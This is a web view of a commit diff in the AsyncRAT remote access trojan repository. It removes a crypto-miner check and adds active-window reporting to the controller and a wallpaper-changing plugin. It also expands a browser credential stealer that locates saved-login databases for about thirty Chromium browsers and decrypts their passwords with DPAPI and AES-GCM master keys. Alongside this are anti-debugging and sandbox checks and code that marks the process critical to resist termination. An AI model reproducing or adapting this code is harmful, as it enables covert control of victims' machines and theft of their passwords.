Sapphire/AsyncRAT-C-Sharp
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update

Browse Source 
removed xmr miner
added get active  window title
updated chrome recovery
added feature change wallpaper
This commit is contained in:
NYAN CAT 2020-03-26 06:17:37 +03:00
parent f5abab2be3
commit 5224ce28f6
29 changed files with 1256 additions and 723 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
AsyncRAT-C#/Client/Client.csproj
View File

@ -80,11 +80,11 @@
<Compile Include="Algorithm\Zip.cs" /> <Compile Include="Algorithm\Zip.cs" />
<Compile Include="Handle Packet\Packet.cs" /> <Compile Include="Handle Packet\Packet.cs" />
<Compile Include="Helper\Anti_Analysis.cs" /> <Compile Include="Helper\Anti_Analysis.cs" />
<Compile Include="Helper\CheckMiner.cs" />
<Compile Include="Helper\HwidGen.cs" /> <Compile Include="Helper\HwidGen.cs" />
<Compile Include="Helper\IdSender.cs" /> <Compile Include="Helper\IdSender.cs" />
<Compile Include="Helper\Methods.cs" /> <Compile Include="Helper\Methods.cs" />
<Compile Include="Helper\MutexControl.cs" /> <Compile Include="Helper\MutexControl.cs" />
<Compile Include="Helper\NativeMethods.cs" />
<Compile Include="Helper\ProcessCritical.cs" /> <Compile Include="Helper\ProcessCritical.cs" />
<Compile Include="Helper\SetRegistry.cs" /> <Compile Include="Helper\SetRegistry.cs" />
<Compile Include="Install\NormalStartup.cs" /> <Compile Include="Install\NormalStartup.cs" />

2
AsyncRAT-C#/Client/Connection/ClientSocket.cs
View File

@ -256,7 +256,7 @@ namespace Client.Connection
{ {
MsgPack msgpack = new MsgPack(); MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "Ping"; msgpack.ForcePathObject("Packet").AsString = "Ping";
msgpack.ForcePathObject("Message").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"}"; msgpack.ForcePathObject("Message").AsString = Methods.GetActiveWindowTitle();
Send(msgpack.Encode2Bytes()); Send(msgpack.Encode2Bytes());
Ping?.Dispose(); Ping?.Dispose();
Interval = 0; Interval = 0;

9
AsyncRAT-C#/Client/Helper/Anti_Analysis.cs
View File

@ -80,7 +80,7 @@ namespace Client.Helper
bool isDebuggerPresent = false; bool isDebuggerPresent = false;
try try
{ {
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent); NativeMethods.CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent; return isDebuggerPresent;
} }
catch catch
@ -93,7 +93,7 @@ namespace Client.Helper
{ {
try try
{ {
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) if (NativeMethods.GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true; return true;
else else
return false; return false;
@ -105,10 +105,5 @@ namespace Client.Helper
} }
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
} }
} }

2
AsyncRAT-C#/Client/Helper/IdSender.cs
View File

@ -20,7 +20,7 @@ namespace Client.Helper
msgpack.ForcePathObject("Path").AsString = Application.ExecutablePath; msgpack.ForcePathObject("Path").AsString = Application.ExecutablePath;
msgpack.ForcePathObject("Version").AsString = Settings.Version; msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User"); msgpack.ForcePathObject("Admin").AsString = Methods.IsAdmin().ToString().ToLower().Replace("true", "Admin").Replace("false", "User");
msgpack.ForcePathObject("Performance").AsString = $"MINER {SetRegistry.GetValue(Settings.Hwid) ?? "0"}"; msgpack.ForcePathObject("Performance").AsString = "...";
msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin; msgpack.ForcePathObject("Pastebin").AsString = Settings.Pastebin;
msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus(); msgpack.ForcePathObject("Antivirus").AsString = Methods.Antivirus();
msgpack.ForcePathObject("Installed").AsString = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString(); msgpack.ForcePathObject("Installed").AsString = new FileInfo(Application.ExecutablePath).LastWriteTime.ToUniversalTime().ToString();

22
AsyncRAT-C#/Client/Helper/Methods.cs
View File

@ -5,6 +5,8 @@ using System.Management;
using System.Security.Principal; using System.Security.Principal;
using System.Drawing.Imaging; using System.Drawing.Imaging;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using static Client.Helper.NativeMethods;
using System.Text;
namespace Client.Helper namespace Client.Helper
{ {
@ -61,8 +63,7 @@ namespace Client.Helper
return null; return null;
} }
[DllImport("kernel32.dll", SetLastError = true)]
public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
public static void PreventSleep() public static void PreventSleep()
{ {
try try
@ -72,11 +73,20 @@ namespace Client.Helper
catch { } catch { }
} }
public enum EXECUTION_STATE : uint public static string GetActiveWindowTitle()
{ {
ES_CONTINUOUS = 0x80000000, try
ES_DISPLAY_REQUIRED = 0x00000002, {
ES_SYSTEM_REQUIRED = 0x00000001 const int nChars = 256;
StringBuilder buff = new StringBuilder(nChars);
IntPtr handle = GetForegroundWindow();
if (GetWindowText(handle, buff, nChars) > 0)
{
return buff.ToString();
}
}
catch { }
return "";
} }
} }
} }

34
AsyncRAT-C#/Client/Helper/NativeMethods.cs Normal file
View File

@ -0,0 +1,34 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Client.Helper
{
public static class NativeMethods
{
[DllImport("user32.dll")]
public static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
public static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern EXECUTION_STATE SetThreadExecutionState(EXECUTION_STATE esFlags);
public enum EXECUTION_STATE : uint
{
ES_CONTINUOUS = 0x80000000,
ES_DISPLAY_REQUIRED = 0x00000002,
ES_SYSTEM_REQUIRED = 0x00000001
}
[DllImport("ntdll.dll", SetLastError = true)]
public static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
}
}

9
AsyncRAT-C#/Client/Helper/ProcessCritical.cs
View File

@ -20,7 +20,7 @@ namespace Client.Helper
{ {
SystemEvents.SessionEnding += new SessionEndingEventHandler(SystemEvents_SessionEnding); SystemEvents.SessionEnding += new SessionEndingEventHandler(SystemEvents_SessionEnding);
Process.EnterDebugMode(); Process.EnterDebugMode();
RtlSetProcessIsCritical(1, 0, 0); Helper.NativeMethods.RtlSetProcessIsCritical(1, 0, 0);
} }
catch { } catch { }
} }
@ -28,7 +28,7 @@ namespace Client.Helper
{ {
try try
{ {
RtlSetProcessIsCritical(0, 0, 0); NativeMethods.RtlSetProcessIsCritical(0, 0, 0);
} }
catch catch
{ {
@ -38,10 +38,5 @@ namespace Client.Helper
} }
} }
} }
#region "Native Methods"
[DllImport("ntdll.dll", SetLastError = true)]
private static extern void RtlSetProcessIsCritical(UInt32 v1, UInt32 v2, UInt32 v3);
#endregion
} }
} }

2
AsyncRAT-C#/Client/Program.cs
View File

@ -40,7 +40,7 @@ namespace Client
Methods.PreventSleep(); //prevent pc to idle\sleep Methods.PreventSleep(); //prevent pc to idle\sleep
new CheckMiner().GetProcess(); //check miner status //new CheckMiner().GetProcess(); //check miner status
} }
catch { } catch { }

2
AsyncRAT-C#/Plugin/Extra/Extra/Extra.csproj
View File

@ -35,6 +35,7 @@
<ItemGroup> <ItemGroup>
<Reference Include="System" /> <Reference Include="System" />
<Reference Include="System.Core" /> <Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" /> <Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml.Linq" /> <Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" /> <Reference Include="System.Data.DataSetExtensions" />
@ -46,6 +47,7 @@
<Compile Include="Connection.cs" /> <Compile Include="Connection.cs" />
<Compile Include="Handler\HandleBlankScreen.cs" /> <Compile Include="Handler\HandleBlankScreen.cs" />
<Compile Include="Handler\HandleDisableDefender.cs" /> <Compile Include="Handler\HandleDisableDefender.cs" />
<Compile Include="Handler\Wallpaper.cs" />
<Compile Include="MessagePack\BytesTools.cs" /> <Compile Include="MessagePack\BytesTools.cs" />
<Compile Include="MessagePack\MsgPack.cs" /> <Compile Include="MessagePack\MsgPack.cs" />
<Compile Include="MessagePack\MsgPackType.cs" /> <Compile Include="MessagePack\MsgPackType.cs" />

40
AsyncRAT-C#/Plugin/Extra/Extra/Handler/Wallpaper.cs Normal file
View File

@ -0,0 +1,40 @@
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
namespace Plugin.Handler
{
public class Wallpaper
{
[DllImport("user32.dll")]
public static extern uint SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);
public static readonly uint SPI_SETDESKWALLPAPER = 0x14;
public static readonly uint SPIF_UPDATEINIFILE = 0x01;
public static readonly uint SPIF_SENDWININICHANGE = 0x02;
public void Change(byte[] img, string exe)
{
string path1 = Path.Combine(Path.GetTempFileName() + exe);
string path2 = Path.Combine(Path.GetTempFileName() + exe);
File.WriteAllBytes(path1, img);
using (Bitmap bmp = new Bitmap(path1))
using (Graphics graphics = Graphics.FromImage(bmp))
{
bmp.Save(path2, ImageFormat.Bmp);
}
using (RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Control Panel\Desktop", true))
{
key.SetValue("WallpaperStyle", 2.ToString());
key.SetValue("TileWallpaper", 0.ToString());
}
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, path2, SPIF_UPDATEINIFILE | SPIF_SENDWININICHANGE);
}
}
}

7
AsyncRAT-C#/Plugin/Extra/Extra/Packet.cs
View File

@ -3,6 +3,7 @@ using Plugin.MessagePack;
using System; using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.Diagnostics; using System.Diagnostics;
using System.Drawing;
using System.IO; using System.IO;
using System.Linq; using System.Linq;
using System.Management; using System.Management;
@ -23,6 +24,12 @@ namespace Plugin
unpack_msgpack.DecodeFromBytes((byte[])data); unpack_msgpack.DecodeFromBytes((byte[])data);
switch (unpack_msgpack.ForcePathObject("Packet").AsString) switch (unpack_msgpack.ForcePathObject("Packet").AsString)
{ {
case "wallpaper":
{
new Wallpaper().Change(unpack_msgpack.ForcePathObject("Image").GetAsBytes(), unpack_msgpack.ForcePathObject("Exe").AsString);
break;
}
case "visitURL": case "visitURL":
{ {
string url = unpack_msgpack.ForcePathObject("URL").AsString; string url = unpack_msgpack.ForcePathObject("URL").AsString;

18
AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Account.cs Normal file
View File

@ -0,0 +1,18 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace Plugin.Browsers.Chromium
{
public class Account
{
public string UserName { get; set; }
public string Password { get; set; }
public string URL { get; set; }
public string Application { get; set; }
}
}

137
AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/AesGcm.cs Normal file
View File

@ -0,0 +1,137 @@
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
namespace Plugin.Browsers.Chromium
{
//AES GCM from https://github.com/dvsekhvalnov/jose-jwt
class AesGcm
{
public byte[] Decrypt(byte[] key, byte[] iv, byte[] aad, byte[] cipherText, byte[] authTag)
{
IntPtr hAlg = OpenAlgorithmProvider(BCrypt.BCRYPT_AES_ALGORITHM, BCrypt.MS_PRIMITIVE_PROVIDER, BCrypt.BCRYPT_CHAIN_MODE_GCM);
IntPtr hKey, keyDataBuffer = ImportKey(hAlg, key, out hKey);
byte[] plainText;
var authInfo = new BCrypt.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(iv, aad, authTag);
using (authInfo)
{
byte[] ivData = new byte[MaxAuthTagSize(hAlg)];
int plainTextSize = 0;
uint status = BCrypt.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref authInfo, ivData, ivData.Length, null, 0, ref plainTextSize, 0x0);
if (status != BCrypt.ERROR_SUCCESS)
throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() (get size) failed with status code: {0}", status));
plainText = new byte[plainTextSize];
status = BCrypt.BCryptDecrypt(hKey, cipherText, cipherText.Length, ref authInfo, ivData, ivData.Length, plainText, plainText.Length, ref plainTextSize, 0x0);
if (status == BCrypt.STATUS_AUTH_TAG_MISMATCH)
throw new CryptographicException("BCrypt.BCryptDecrypt(): authentication tag mismatch");
if (status != BCrypt.ERROR_SUCCESS)
throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() failed with status code:{0}", status));
}
BCrypt.BCryptDestroyKey(hKey);
Marshal.FreeHGlobal(keyDataBuffer);
BCrypt.BCryptCloseAlgorithmProvider(hAlg, 0x0);
return plainText;
}
private int MaxAuthTagSize(IntPtr hAlg)
{
byte[] tagLengthsValue = GetProperty(hAlg, BCrypt.BCRYPT_AUTH_TAG_LENGTH);
return BitConverter.ToInt32(new[] { tagLengthsValue[4], tagLengthsValue[5], tagLengthsValue[6], tagLengthsValue[7] }, 0);
}
private IntPtr OpenAlgorithmProvider(string alg, string provider, string chainingMode)
{
IntPtr hAlg = IntPtr.Zero;
uint status = BCrypt.BCryptOpenAlgorithmProvider(out hAlg, alg, provider, 0x0);
if (status != BCrypt.ERROR_SUCCESS)
throw new CryptographicException(string.Format("BCrypt.BCryptOpenAlgorithmProvider() failed with status code:{0}", status));
byte[] chainMode = Encoding.Unicode.GetBytes(chainingMode);
status = BCrypt.BCryptSetAlgorithmProperty(hAlg, BCrypt.BCRYPT_CHAINING_MODE, chainMode, chainMode.Length, 0x0);
if (status != BCrypt.ERROR_SUCCESS)
throw new CryptographicException(string.Format("BCrypt.BCryptSetAlgorithmProperty(BCrypt.BCRYPT_CHAINING_MODE, BCrypt.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}", status));
return hAlg;
}
private IntPtr ImportKey(IntPtr hAlg, byte[] key, out IntPtr hKey)
{
byte[] objLength = GetProperty(hAlg, BCrypt.BCRYPT_OBJECT_LENGTH);
int keyDataSize = BitConverter.ToInt32(objLength, 0);
IntPtr keyDataBuffer = Marshal.AllocHGlobal(keyDataSize);
byte[] keyBlob = Concat(BCrypt.BCRYPT_KEY_DATA_BLOB_MAGIC, BitConverter.GetBytes(0x1), BitConverter.GetBytes(key.Length), key);
uint status = BCrypt.BCryptImportKey(hAlg, IntPtr.Zero, BCrypt.BCRYPT_KEY_DATA_BLOB, out hKey, keyDataBuffer, keyDataSize, keyBlob, keyBlob.Length, 0x0);
if (status != BCrypt.ERROR_SUCCESS)
throw new CryptographicException(string.Format("BCrypt.BCryptImportKey() failed with status code:{0}", status));
return keyDataBuffer;
}
private byte[] GetProperty(IntPtr hAlg, string name)
{
int size = 0;
uint status = BCrypt.BCryptGetProperty(hAlg, name, null, 0, ref size, 0x0);
if (status != BCrypt.ERROR_SUCCESS)
throw new CryptographicException(string.Format("BCrypt.BCryptGetProperty() (get size) failed with status code:{0}", status));
byte[] value = new byte[size];
status = BCrypt.BCryptGetProperty(hAlg, name, value, value.Length, ref size, 0x0);
if (status != BCrypt.ERROR_SUCCESS)
throw new CryptographicException(string.Format("BCrypt.BCryptGetProperty() failed with status code:{0}", status));
return value;
}
public byte[] Concat(params byte[][] arrays)
{
int len = 0;
foreach (byte[] array in arrays)
{
if (array == null)
continue;
len += array.Length;
}
byte[] result = new byte[len - 1 + 1];
int offset = 0;
foreach (byte[] array in arrays)
{
if (array == null)
continue;
Buffer.BlockCopy(array, 0, result, offset, array.Length);
offset += array.Length;
}
return result;
}
}
}

179
AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/BCrypt.cs Normal file
View File

@ -0,0 +1,179 @@
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace Plugin.Browsers.Chromium
{
public static class BCrypt
{
public const uint ERROR_SUCCESS = 0x00000000;
public const uint BCRYPT_PAD_PSS = 8;
public const uint BCRYPT_PAD_OAEP = 4;
public static readonly byte[] BCRYPT_KEY_DATA_BLOB_MAGIC = BitConverter.GetBytes(0x4d42444b);
public static readonly string BCRYPT_OBJECT_LENGTH = "ObjectLength";
public static readonly string BCRYPT_CHAIN_MODE_GCM = "ChainingModeGCM";
public static readonly string BCRYPT_AUTH_TAG_LENGTH = "AuthTagLength";
public static readonly string BCRYPT_CHAINING_MODE = "ChainingMode";
public static readonly string BCRYPT_KEY_DATA_BLOB = "KeyDataBlob";
public static readonly string BCRYPT_AES_ALGORITHM = "AES";
public static readonly string MS_PRIMITIVE_PROVIDER = "Microsoft Primitive Provider";
public static readonly int BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG = 0x00000001;
public static readonly int BCRYPT_INIT_AUTH_MODE_INFO_VERSION = 0x00000001;
public static readonly uint STATUS_AUTH_TAG_MISMATCH = 0xC000A002;
[StructLayout(LayoutKind.Sequential)]
public struct BCRYPT_PSS_PADDING_INFO
{
public BCRYPT_PSS_PADDING_INFO(string pszAlgId, int cbSalt)
{
this.pszAlgId = pszAlgId;
this.cbSalt = cbSalt;
}
[MarshalAs(UnmanagedType.LPWStr)]
public string pszAlgId;
public int cbSalt;
}
[StructLayout(LayoutKind.Sequential)]
public struct BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO : IDisposable
{
public int cbSize;
public int dwInfoVersion;
public IntPtr pbNonce;
public int cbNonce;
public IntPtr pbAuthData;
public int cbAuthData;
public IntPtr pbTag;
public int cbTag;
public IntPtr pbMacContext;
public int cbMacContext;
public int cbAAD;
public long cbData;
public int dwFlags;
public BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(byte[] iv, byte[] aad, byte[] tag) : this()
{
dwInfoVersion = BCRYPT_INIT_AUTH_MODE_INFO_VERSION;
cbSize = Marshal.SizeOf(typeof(BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO));
if (iv != null)
{
cbNonce = iv.Length;
pbNonce = Marshal.AllocHGlobal(cbNonce);
Marshal.Copy(iv, 0, pbNonce, cbNonce);
}
if (aad != null)
{
cbAuthData = aad.Length;
pbAuthData = Marshal.AllocHGlobal(cbAuthData);
Marshal.Copy(aad, 0, pbAuthData, cbAuthData);
}
if (tag != null)
{
cbTag = tag.Length;
pbTag = Marshal.AllocHGlobal(cbTag);
Marshal.Copy(tag, 0, pbTag, cbTag);
cbMacContext = tag.Length;
pbMacContext = Marshal.AllocHGlobal(cbMacContext);
}
}
public void Dispose()
{
if (pbNonce != IntPtr.Zero) Marshal.FreeHGlobal(pbNonce);
if (pbTag != IntPtr.Zero) Marshal.FreeHGlobal(pbTag);
if (pbAuthData != IntPtr.Zero) Marshal.FreeHGlobal(pbAuthData);
if (pbMacContext != IntPtr.Zero) Marshal.FreeHGlobal(pbMacContext);
}
}
[StructLayout(LayoutKind.Sequential)]
public struct BCRYPT_KEY_LENGTHS_STRUCT
{
public int dwMinLength;
public int dwMaxLength;
public int dwIncrement;
}
[StructLayout(LayoutKind.Sequential)]
public struct BCRYPT_OAEP_PADDING_INFO
{
public BCRYPT_OAEP_PADDING_INFO(string alg)
{
pszAlgId = alg;
pbLabel = IntPtr.Zero;
cbLabel = 0;
}
[MarshalAs(UnmanagedType.LPWStr)]
public string pszAlgId;
public IntPtr pbLabel;
public int cbLabel;
}
[DllImport("bcrypt.dll")]
public static extern uint BCryptOpenAlgorithmProvider(out IntPtr phAlgorithm,
[MarshalAs(UnmanagedType.LPWStr)] string pszAlgId,
[MarshalAs(UnmanagedType.LPWStr)] string pszImplementation,
uint dwFlags);
[DllImport("bcrypt.dll")]
public static extern uint BCryptCloseAlgorithmProvider(IntPtr hAlgorithm, uint flags);
[DllImport("bcrypt.dll", EntryPoint = "BCryptGetProperty")]
public static extern uint BCryptGetProperty(IntPtr hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, byte[] pbOutput, int cbOutput, ref int pcbResult, uint flags);
[DllImport("bcrypt.dll", EntryPoint = "BCryptSetProperty")]
internal static extern uint BCryptSetAlgorithmProperty(IntPtr hObject, [MarshalAs(UnmanagedType.LPWStr)] string pszProperty, byte[] pbInput, int cbInput, int dwFlags);
[DllImport("bcrypt.dll")]
public static extern uint BCryptImportKey(IntPtr hAlgorithm,
IntPtr hImportKey,
[MarshalAs(UnmanagedType.LPWStr)] string pszBlobType,
out IntPtr phKey,
IntPtr pbKeyObject,
int cbKeyObject,
byte[] pbInput, //blob of type BCRYPT_KEY_DATA_BLOB + raw key data = (dwMagic (4 bytes) | uint dwVersion (4 bytes) | cbKeyData (4 bytes) | data)
int cbInput,
uint dwFlags);
[DllImport("bcrypt.dll")]
public static extern uint BCryptDestroyKey(IntPtr hKey);
[DllImport("bcrypt.dll")]
public static extern uint BCryptEncrypt(IntPtr hKey,
byte[] pbInput,
int cbInput,
ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo,
byte[] pbIV, int cbIV,
byte[] pbOutput,
int cbOutput,
ref int pcbResult,
uint dwFlags);
[DllImport("bcrypt.dll")]
internal static extern uint BCryptDecrypt(IntPtr hKey,
byte[] pbInput,
int cbInput,
ref BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO pPaddingInfo,
byte[] pbIV,
int cbIV,
byte[] pbOutput,
int cbOutput,
ref int pcbResult,
int dwFlags);
}
}

440
AsyncRAT-C#/Plugin/Recovery/Recovery/Browsers/Chromium/Chromium.cs
View File

@ -2,6 +2,7 @@
using System.Collections.Generic; using System.Collections.Generic;
using System.IO; using System.IO;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text; using System.Text;
using Plugin.Browsers.Chromium; using Plugin.Browsers.Chromium;
@ -9,6 +10,8 @@ namespace Plugin.Browsers.Chromium
{ {
public class Chromium public class Chromium
{ {
public static string LocalApplicationData = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);
public static string ApplicationData = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
public void CookiesRecovery(StringBuilder Coocks) public void CookiesRecovery(StringBuilder Coocks)
{ {
@ -118,155 +121,311 @@ namespace Plugin.Browsers.Chromium
} }
} }
public static StringBuilder Recovery(StringBuilder stringBuilder)
public void Recovery(StringBuilder Pass)
{ {
try Dictionary<string, string> ChromiumPaths = new Dictionary<string, string>()
{ {
foreach (string str in this.GetAppDataFolders())
{ {
try "Chrome",
LocalApplicationData + @"\Google\Chrome\User Data"
},
{ {
string[] browser = { "Opera",
str + "\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Path.Combine(ApplicationData, @"Opera Software\Opera Stable")
str + "\\Roaming\\Opera Software\\Opera Stable\\Login Data", },
str + "\\Local\\Vivaldi\\User Data\\Default\\Login Data", {
str + "\\Local\\Chromium\\User Data\\Default\\Login Data", "Yandex",
str + "\\Local\\Torch\\User Data\\Default\\Login Data", Path.Combine(LocalApplicationData, @"Yandex\YandexBrowser\User Data")
str + "\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data", },
str + "\\Local\\Xpom\\User Data\\Default\\Login Data", {
str + "\\Local\\Orbitum\\User Data\\Default\\Login Data", "360 Browser",
str + "\\Local\\Kometa\\User Data\\Default\\Login Data", LocalApplicationData + @"\360Chrome\Chrome\User Data"
str + "\\Local\\Amigo\\User Data\\Default\\Login Data", },
str + "\\Local\\Nichrome\\User Data\\Default\\Login Data", {
str + "\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Login Data", "Comodo Dragon",
str + "\\Local\\Yandex\\YandexBrowser\\User Data\\Default\\Ya Login Data", Path.Combine(LocalApplicationData, @"Comodo\Dragon\User Data")
},
{
"CoolNovo",
Path.Combine(LocalApplicationData, @"MapleStudio\ChromePlus\User Data")
},
{
"SRWare Iron",
Path.Combine(LocalApplicationData, @"Chromium\User Data")
},
{
"Torch Browser",
Path.Combine(LocalApplicationData, @"Torch\User Data")
},
{
"Brave Browser",
Path.Combine(LocalApplicationData, @"BraveSoftware\Brave-Browser\User Data")
},
{
"Iridium Browser",
LocalApplicationData + @"\Iridium\User Data"
},
{
"7Star",
Path.Combine(LocalApplicationData, @"7Star\7Star\User Data")
},
{
"Amigo",
Path.Combine(LocalApplicationData, @"Amigo\User Data")
},
{
"CentBrowser",
Path.Combine(LocalApplicationData, @"CentBrowser\User Data")
},
{
"Chedot",
Path.Combine(LocalApplicationData, @"Chedot\User Data")
},
{
"CocCoc",
Path.Combine(LocalApplicationData, @"CocCoc\Browser\User Data")
},
{
"Elements Browser",
Path.Combine(LocalApplicationData, @"Elements Browser\User Data")
},
{
"Epic Privacy Browser",
Path.Combine(LocalApplicationData, @"Epic Privacy Browser\User Data")
},
{
"Kometa",
Path.Combine(LocalApplicationData, @"Kometa\User Data")
},
{
"Orbitum",
Path.Combine(LocalApplicationData, @"Orbitum\User Data")
},
{
"Sputnik",
Path.Combine(LocalApplicationData, @"Sputnik\Sputnik\User Data")
},
{
"uCozMedia",
Path.Combine(LocalApplicationData, @"uCozMedia\Uran\User Data")
},
{
"Vivaldi",
Path.Combine(LocalApplicationData, @"Vivaldi\User Data")
},
{
"Sleipnir 6",
Path.Combine(ApplicationData, @"Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer")
},
{
"Citrio",
Path.Combine(LocalApplicationData, @"CatalinaGroup\Citrio\User Data")
},
{
"Coowon",
Path.Combine(LocalApplicationData, @"Coowon\Coowon\User Data")
},
{
"Liebao Browser",
Path.Combine(LocalApplicationData, @"liebao\User Data")
},
{
"QIP Surf",
Path.Combine(LocalApplicationData, @"QIP Surf\User Data")
},
{
"Edge Chromium",
Path.Combine(LocalApplicationData, @"Microsoft\Edge\User Data")
}
}; };
int selected = 0; var list = new List<Account>();
foreach (string b in browser)
foreach (var item in ChromiumPaths)
list.AddRange(Accounts(item.Value, item.Key));
foreach (var b in list)
{ {
if (File.Exists(b)) stringBuilder.Append("Url: " + b.URL + "\n");
stringBuilder.Append("Username: " + b.UserName + "\n");
stringBuilder.Append("Password: " + b.Password + "\n");
stringBuilder.Append("Application: " + b.Application + "\n");
stringBuilder.Append("=============================" + "\n");
}
return stringBuilder;
}
private static List<Account> Accounts(string path, string browser, string table = "logins")
{ {
SQLiteHandler sqliteHandler = new SQLiteHandler(b);
//Get all created profiles from browser path
List<string> loginDataFiles = GetAllProfiles(path);
List<Account> data = new List<Account>();
foreach (string loginFile in loginDataFiles.ToArray())
{
if (!File.Exists(loginFile))
continue;
SQLiteHandler SQLDatabase;
try try
{ {
sqliteHandler.ReadTable("logins"); SQLDatabase = new SQLiteHandler(loginFile); //Open database with Sqlite
} }
catch catch (System.Exception ex)
{ {
Console.WriteLine(ex.ToString());
continue;
} }
switch (selected) if (!SQLDatabase.ReadTable(table))
{ continue;
case 0:
Pass.Append("\n== Chrome ==========\n");
break;
case 1:
Pass.Append("\n== Opera ===========\n");
break;
case 2:
Pass.Append("\n== Vivaldi ===========\n");
break;
case 3:
Pass.Append("\n== Chromium ===========\n");
break;
case 4:
Pass.Append("\n== Torch ===========\n");
break;
case 5:
Pass.Append("\n== Comodo ===========\n");
break;
case 6:
Pass.Append("\n== Xpom ===========\n");
break;
case 7:
Pass.Append("\n== Orbitum ===========\n");
break;
case 8:
Pass.Append("\n== Kometa ===========\n");
break;
case 9:
Pass.Append("\n== Amigo ===========\n");
break;
case 10:
Pass.Append("\n== Nichrome ===========\n");
break;
case 11:
Pass.Append("\n== Brave ===========\n");
break;
case 12:
Pass.Append("\n== Yandex ===========\n");
Pass.Append("Not Work for now!\n");
break;
}
for (int j = 0; j <= sqliteHandler.GetRowCount() - 1; j++) for (int I = 0; I <= SQLDatabase.GetRowCount() - 1; I++)
{ {
string value = sqliteHandler.GetValue(j, "origin_url"); try
string value2 = sqliteHandler.GetValue(j, "username_value");
string value3 = sqliteHandler.GetValue(j, "password_value");
string text = string.Empty;
if (!string.IsNullOrEmpty(value3))
{ {
text = this.Decrypt(Encoding.Default.GetBytes(value3)); //Get values with row number and column name
string host = SQLDatabase.GetValue(I, "origin_url");
string username = SQLDatabase.GetValue(I, "username_value");
string password = SQLDatabase.GetValue(I, "password_value");
if (password != null)
{
//check v80 password signature. its starting with v10 or v11
if (password.StartsWith("v10") || password.StartsWith("v11"))
{
//Local State file located in the parent folder of profile folder.
byte[] masterKey = GetMasterKey(Directory.GetParent(loginFile).Parent.FullName);
if (masterKey == null)
continue;
password = DecryptWithKey(Encoding.Default.GetBytes(password), masterKey);
} }
else else
{ password = Decrypt(password); //Old versions using UnprotectData for decryption without any key
text = "";
}
Pass.Append(string.Concat(new string[]
{
value,
"\nU: ",
value2,
"\nP: ",
text,
"\n\n"
}));
} }
else
continue;
if (!string.IsNullOrEmpty(host) && !string.IsNullOrEmpty(username) && !string.IsNullOrEmpty(password))
data.Add(new Account() { URL = host, UserName = username, Password = password, Application = browser });
} }
catch (Exception ex)
selected++;
}
}
catch (Exception)
{ {
Console.WriteLine(ex.ToString());
} }
} }
} }
catch
{
}
}
private string Decrypt(byte[] Datas) return data;
}
private static List<string> GetAllProfiles(string DirectoryPath)
{ {
string result; List<string> loginDataFiles = new List<string>
{
DirectoryPath + @"\Default\Login Data",
